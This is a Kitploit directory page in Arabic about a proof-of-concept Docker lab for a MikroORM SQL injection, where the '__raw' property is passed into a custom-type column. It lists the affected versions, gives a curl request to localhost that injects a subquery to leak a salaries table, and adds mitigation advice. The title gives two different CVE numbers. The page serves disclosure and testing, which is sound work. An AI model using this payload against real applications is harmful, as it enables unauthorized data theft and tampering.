Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34220 — إثبات مفهوم ومختبر Docker لإعادة إنتاج CVE-2026-43220، وهو حقن SQL في MikroORM عبر خصائص __raw غير المُتحقق منها في أعمدة الأنواع المخصصة، مع خطوات استغلال قائمة على curl. | Kitploit
أدوات/GitHubGitHub/yym8538/cve-2026-34220
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالمحاكاة الافتراضية للأمانأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubyym8538/cve-2026-34220

CVE-2026-34220

إثبات مفهوم ومختبر Docker لإعادة إنتاج CVE-2026-43220، وهو حقن SQL في MikroORM عبر خصائص __raw غير المُتحقق منها في أعمدة الأنواع المخصصة، مع خطوات استغلال قائمة على curl.

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

‏CVE-2026-43220 حقن SQL في MikroORM

★ إثبات مفهوم حقن SQL في MikroORM CVE-2026-43220 ★

https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1


نظرة عامة

CVE-2026-43220 هو ثغرة حقن SQL في MikroORM، وهو إطار عمل ORM شائع الاستخدام في TypeScript/Node.js.
عندما تُمرَّر قيمة مقدَّمة من المستخدم تحتوي على خاصية __raw إلى عمود Custom Type دون التحقق منها، يتعرف فحص isRaw() في MikroORM عليها كتعبير Raw SQL داخلي موثوق ويُدرج قيمة sql التي يتحكم بها المهاجم مباشرةً في الاستعلام المُولَّد دون تحويل للنوع أو تعقيم، مما يؤدي إلى تنفيذ غير مقصود لـ SQL عشوائي.


الإصدارات المتأثرة

الفئةالإصدار
معرّضة للثغرةMikroORM الإصدار ≤ 6.4.3 و 7.0.0 ≤ الإصدار ≤ 7.0.5
مُصحَّحةMikroORM 6.4.4 و 7.0.6

التأثير

  • تسريب بيانات حساسة من قاعدة البيانات دون تصريح
  • إفساد أو تعديل غير مقصود لسجلات قاعدة البيانات الموجودة

البيئة

docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln

إثبات المفهوم

بعد تشغيل البيئة المعرّضة للثغرة، اتبع الخطوات أدناه لإعادة إنتاج الهجوم.

الخطوة 1. إرسال طلب بحمولة خبيثة تحتوي على __raw

أرسل جسم JSON يتضمن خاصية __raw تستهدف عمود Custom Type.

curl -X POST http://localhost:3000/write \
  -H "Content-Type: application/json" \
  -d '{
    "author":"x",
    "title":"x,
    "content": {
      "__raw": true,
      "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)"
    }
  }'

الخطوة 2. التحقق من استجابة HTTP

تحقق من أن الـ API يُرجع استجابة ناجحة دون أي خطأ، مما يشير إلى أن MikroORM قَبِل الحمولة الخبيثة كقيمة صالحة.

الخطوة 3. تأكيد تسريب البيانات الحساسة إلى محتوى المنشور

تحقق من أن حقل content في المنشور المُنشأ يحتوي على نتيجة الاستعلام من جدول salaries (مثل Alice: 5000 / Bob: 7000 / ...)، مما يؤكد أن بيانات من جدول غير ذي صلة قد دُمجت بصمت في الاستجابة دون أي خطأ أو انتهاك لضوابط الوصول.


التخفيف

  • الترقية إلى MikroORM 6.4.4 أو أحدث، والذي يقدّم التحقق من المصدر في isRaw() لرفض خصائص __raw المقدَّمة من الخارج
  • تطبيق التحقق من المدخلات القائم على القائمة البيضاء لرفض الخصائص غير المتوقعة مثل __raw قبل تمرير القيم إلى طبقة ORM

التحليل

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
  • EN: https://www.skshieldus.com/en/report?tab=eqst
تنزيل الأداة